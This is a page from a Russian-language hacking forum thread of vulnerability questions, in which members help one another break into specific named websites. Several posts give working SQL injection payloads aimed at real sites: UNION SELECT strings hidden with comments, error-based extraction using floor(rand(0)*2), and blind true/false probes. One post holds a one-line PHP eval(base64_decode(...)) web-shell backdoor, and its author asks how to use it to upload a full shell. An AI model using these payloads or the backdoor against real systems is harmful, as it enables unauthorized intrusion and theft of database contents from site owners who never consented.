Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    393
    Likes Received:
    35
    Reputations:
    1
    Drupal 6. Конкретнее не знаю.
     
  2. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    44
    Likes Received:
    2
    Reputations:
    5
    да вот даже не знаю где можно пример найти, там самописный двиг. стоит на mssql - это 100%. в принципе хотелось бы как-нибудь вставить кавычку, она судя по всему и нужна для успешной инъекции.. только трабл, как я писал - она фильтруется. какие ещё способы ?

    вот тут вот _http://www.xakep.ru/post/43124/ описывается как ломать mssql. пункт:
    очень странный. он в таком случае юзает просто без кавычек инжу ) что в моём случае не тянет..
     
    #16222 exT1ma4ka, 1 Mar 2011
    Last edited: 1 Mar 2011
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,589
    Likes Received:
    406
    Reputations:
    196

    Да, я ошибся. Инъекцию легко провести в таком случае как у тебя вот так.

    eyvasaaaa.com/getinfo/user/13'%20or%201=@@version--

    Но так как у тебя кавычка фильтруется, то сделать это будет сложней или вообще невозможно. Для начала нужно определить каким-либо образом действительно ли в скрипте идет перевод спецсимволов в сущности(аналог htmlspecialchars() в php)...
     
  4. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    71
    Likes Received:
    20
    Reputations:
    1
    http://www.biowoodenergy.com/newsletter.php

    POST sample@email.tst&energy%5b%5d= '

    не поддаётся , кому не сложно посмотрите
    есть ли там вообще дыра
    спс
     
  5. Dima282

    Dima282 Banned

    Joined:
    14 Jun 2007
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    подскажите пожалуйста
    http://www.cwars.ru/lib/index.php?r='
    это Sql уязвимость? пытаюсь определить количество полей, нечего не получается.
     
  6. fin13

    fin13 New Member

    Joined:
    2 Jul 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    помгите кто знает

    Недавно при сканирование одного сервиса через Acunetix Web Vulnerability Scanner 7 нашол следующию дырдочку а вот теперь как сней дальше быть ненаю :confused:
    Сами дырдачки
    Security fixes in Apache version 1.3.39:
    CVE-2006-5752 (cve.mitre.org) mod_status: Fix a possible XSS attack against a site with a public server-status page and ExtendedStatus enabled, for browsers which perform charset "detection". Reported by Stefan Esser. [Joe Orton]
    CVE-2007-3304 (cve.mitre.org) Ensure that the parent process cannot be forced to kill non-child processes by checking scoreboard PID data with parent process privately stored PID data.

    если не сложно и можно подскажите что дальше и где достать сам скрипт и exploit и вобще возможна ли атака sql Inj

    спасибо!!! :cool:
     
  7. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    393
    Likes Received:
    35
    Reputations:
    1
    Не возможна т.к её нет. :rolleyes:
     
  8. fin13

    fin13 New Member

    Joined:
    2 Jul 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Понятное дело что щас её там нет но дырдачка в самом апаче если его обойти и залить намеренно файл который будит дампить бд это возможно и что для этого надо
     
  9. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    http://www.cwars.ru/lib/index.php?r='+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1+--+
     
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    интересует вот этот баг JBoss HttpAdaptor JMXInvokerServlet если можно назват багом

    нашел док про нему но пока что английский хромает))
    http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf

    если кто знает норм подробную описание был бы благодарен
     
  11. exT1ma4ka

    exT1ma4ka New Member

    Joined:
    12 May 2010
    Messages:
    44
    Likes Received:
    2
    Reputations:
    5
    как это можно сделать ?
     
  12. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Нашел какую то нестандартную скулю, ну или или ее подобие на нужном мне сайте.
    http://www.bading.com/index.php?option=com_fireboard&Itemid=33&func=view&catid=2&id=667
    После того как подставляю ' к func=view, сообщения ниже пропадают. Но если уберу &catid=2&id=667 сообщений и так не будет.
    Подскажите пожалуйста, как с ней работать и скуля ли это вообще?

    Добавлено через время

    И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов.
    http://www.boatquotes.com/marine-surveys.php?catid=5
     
    #16232 Fooog, 2 Mar 2011
    Last edited: 2 Mar 2011
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Думаю, что раскрутить её не получится.
     
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    http://www.boatquotes.com/marine-surveys.php?catid=5/**/uNiOn/**/SeLeCt/**/1--+

    Не могу понять логики запроса... Может кто сможет далее раскрутить.

    Ну или можно крутить, как блайнд:
    http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=5--+ (true)

    http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=4--+ (false)
    Попробуй сделать вывод в ошибку.
     
    #16234 Tigger, 2 Mar 2011
    Last edited: 2 Mar 2011
    2 people like this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
     
    _________________________
    4 people like this.
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,255
    Likes Received:
    1,147
    Reputations:
    886
    [​IMG]

    :)

    а вообще вот
     
    _________________________
  18. fin13

    fin13 New Member

    Joined:
    2 Jul 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку
    /mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID%%5D'&url=980852'
    кто реально может помочь пишите в личку дам полный линк
    а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    А в чем проблема, что 404 или выкидывает?
    1) Может быть WAF.
    2) Если идет инклюд или открытие файла, а ты вставляешь кавычку или из-за кавычки SQL-запрос становиться неверным, то перекидывать на главную страницу.

    Там может быть и нету иньекции, с чего ты взял что она есть? о_0
    Ну или попробуй вместо кавычки подставить верный SQL-запрос (and 1=1), и неверный (and 1=2) если при первом не перекинуло на главную, а на 2ом перекинуло, то SQL-inject есть.
    Удачи.
     
  20. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    какие еще команды есть напободие wget?

    <?php
    if (!empty($_POST['e']))
    @eval(base64_decode($_POST['e']));
    ?>

    можно ли этой командой залить полноценный шелл? можно примерчик?
     
Loading...
Thread Status:
Not open for further replies.